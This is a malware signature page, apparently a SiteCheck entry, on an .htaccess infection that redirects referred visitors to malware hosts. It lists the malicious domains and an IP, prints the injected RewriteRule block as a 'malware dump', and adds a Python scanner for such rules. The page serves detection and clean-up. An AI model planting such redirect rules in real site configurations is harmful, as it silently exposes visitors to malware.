SiteCheck Signatures

malware-entry-g-oogl-e-com

Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from (91.201.66.38):

12583497154.ru
6846183415.ru
g-oogl-e.com
uploadfriends2010.ru

Affecting:
Any type of web site (no specific target).

Clean up and details:
Remove the offending code from .htaccess and/or index.php.

Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
http://sucuri.net/malware/malware-entry-mwhta7

Malware dump:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}
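
One way to locate this kind of block during clean-up, as an added example (not Sucuri's code or part of the original signature): the Python sketch below flags any RewriteRule that sends requests to a foreign host and is gated on the Referer header, as in the dump above. The function name, the own_hosts parameter and the benign rules in SAMPLE are assumptions made for illustration; example.org is a placeholder.

```python
import re
from urllib.parse import urlsplit

# Apache directive names are case-insensitive; quoted arguments are not handled.
COND = re.compile(r'^\s*RewriteCond\s+(\S+)\s+(\S+)', re.I)
RULE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)', re.I)

def find_referer_redirects(htaccess_text, own_hosts=()):
    """Return (line_no, target_host, conds) for each RewriteRule whose
    substitution is an absolute URL on a host outside own_hosts and whose
    preceding RewriteCond lines test %{HTTP_REFERER}."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith('#'):
            continue
        m = COND.match(line)
        if m:
            conds.append((m.group(1), m.group(2)))
            continue
        m = RULE.match(line)
        if not m:
            continue
        target, host = m.group(2), ''
        if re.match(r'https?://', target, re.I):
            host = (urlsplit(target).hostname or '').lower()
        if '%{' in host:      # host built from a server variable, e.g. %{HTTP_HOST}
            host = ''
        gated = any('HTTP_REFERER' in test.upper() for test, _ in conds)
        if host and host not in own and gated:
            findings.append((no, host, list(conds)))
        conds = []            # RewriteCond lines apply only to the next RewriteRule
    return findings

# Constructed sample: two benign rule sets (canonical host redirect, hotlink
# block) followed by the rule block from the malware dump on this page.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} !example\.org [NC]
RewriteRule \.(jpg|png)$ - [F]
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}
"""

if __name__ == "__main__":
    for line_no, host, conds in find_referer_redirects(SAMPLE, own_hosts=["www.example.org"]):
        print(f"line {line_no}: referer-gated redirect to {host} ({len(conds)} conditions)")
```

Run it over every .htaccess file under the document root, not only the top-level one, and review each hit by hand before deleting anything.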